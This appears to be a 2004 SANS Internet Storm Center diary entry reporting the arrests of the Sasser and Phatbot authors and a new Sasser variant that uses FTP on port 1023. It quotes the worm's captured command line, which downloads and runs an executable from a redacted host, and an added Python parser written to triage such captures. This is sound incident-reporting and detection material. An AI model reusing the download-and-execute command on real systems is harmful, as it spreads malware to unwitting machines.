Author of Sasser worm and Phatbot caught; New Sasser Worm Variant; SANS Security Newsletters and Digests
Author of Sasser worm and Phatbot caught
Several news outlets have reported that the author of the Sasser worm has been caught in Germany. See:
http://news.bbc.co.uk/1/hi/world/europe/3695857.stm
http://news.yahoo.com/news?tmpl=story&cid=562&u=/ap/20040508/ap_on_hi_te/germany_computer_worm&printer=1
http://www.reuters.com/newsArticle.jhtml?type=internetNews&storyID=5080701
http://www.lka.niedersachsen.de/aktuelles/archiv/2004/sasser_080504.htm (German)
In a Microsoft Press Release, Microsoft says that they will hold a teleconference about this arrest:
http://www.microsoft.com/presspass/press/2004/may04/05-08SasserArrestMA.asp
Another news report says that the Phatbot creator has been hunted down too:
http://www.heise.de/newsticker/meldung/47209 (German)
http://www.securitynewsportal.com/cgi-bin/cgi-script/csNews/csNews.cgi?database=JanEE%2edb&command=viewone&id=15
New Sasser Worm Variant
We received a submission from Duda, who detected a possible new Sasser worm variant infecting via port 1023 instead of the usual port 5554. If you have seen this, please let us know.
echo off&echo open xx.xx.xx.xx 1023>>cmd.ftp&echo anonymous>>cmd.ftp&echo user&echo bin>>cmd.ftp&echo get 17325_upload.exe>>cmd.ftp
&echo bye>>cmd.ftp&echo on&ftp -s:cmd.ftp&17325_upload.exe&echo off&del cmd.ftp&echo on
According to the McAfee write-up, this is the Sasser E variant, and it matches the ports used:
* It creates a remote shell on TCP port 1022 rather than 9995 or 9996
* It uses FTP on TCP port 1023 instead of 5554
http://vil.nai.com/vil/content/v_125091.htm
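For triaging similar captures, the following added example (not part of the original diary or of any vendor tool) parses a command of the shape shown above, extracts the FTP host, port and file name, and labels the capture by FTP port using only the two ports named in this diary. The function name, the labels and the two constructed samples are assumptions made for illustration.

```python
import re

# FTP port -> label, using only the ports given in the diary and the write-up it cites.
VARIANT_BY_FTP_PORT = {5554: "Sasser (usual port)", 1023: "Sasser E"}

OPEN_RE = re.compile(r"echo\s+open\s+(\S+)\s+(\d{1,5})\s*>>\s*(\S+?\.ftp)", re.I)
GET_RE = re.compile(r"echo\s+get\s+(\S+?\.exe)\s*>>", re.I)
RUN_RE = re.compile(r"ftp\s+-s:(\S+?\.ftp)", re.I)

def parse_download_command(payload):
    """Return the FTP host, port and file from a captured command, or None."""
    # Captures are often wrapped across lines, so join them before matching.
    text = re.sub(r"\s*[\r\n]+\s*", "", payload)
    opened, got, ran = OPEN_RE.search(text), GET_RE.search(text), RUN_RE.search(text)
    if not (opened and got and ran):
        return None
    # The script that is written must be the one handed to ftp -s:
    if opened.group(3).lower() != ran.group(1).lower():
        return None
    port = int(opened.group(2))
    if not 0 < port < 65536:
        return None
    filename = got.group(1)
    return {
        "ftp_host": opened.group(1),
        "ftp_port": port,
        "filename": filename,
        # True when the fetched file is also launched after the transfer.
        "executed": ("&" + filename.lower() + "&") in text[ran.end():].lower(),
        "variant": VARIANT_BY_FTP_PORT.get(port, "unknown FTP port"),
    }

# The command as printed in the diary (address already redacted there).
DIARY_CAPTURE = (
    "echo off&echo open xx.xx.xx.xx 1023>>cmd.ftp&echo anonymous>>cmd.ftp&echo user"
    "&echo bin>>cmd.ftp&echo get 17325_upload.exe>>cmd.ftp\n"
    "&echo bye>>cmd.ftp&echo on&ftp -s:cmd.ftp&17325_upload.exe&echo off&del cmd.ftp&echo on"
)
# Constructed samples: same shape on the usual port, and an unrelated command.
CONSTRUCTED_5554 = (
    "echo off&echo open 192.0.2.10 5554>>cmd.ftp&echo get 00000_sample.exe>>cmd.ftp"
    "&echo bye>>cmd.ftp&ftp -s:cmd.ftp&00000_sample.exe&del cmd.ftp"
)
CONSTRUCTED_BENIGN = "ftp -s:backup.ftp"

if __name__ == "__main__":
    for sample in (DIARY_CAPTURE, CONSTRUCTED_5554, CONSTRUCTED_BENIGN):
        print(parse_download_command(sample))
```
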
SANS Security Newsletters and Digests
Too much news to catch up on? SANS provides weekly security newsletters and digests, which let you stay up to date even if you cannot track security news every day. Over the weekend, do take a look and sign up for the free newsletters and digests.
http://www.sans.org/newsletters/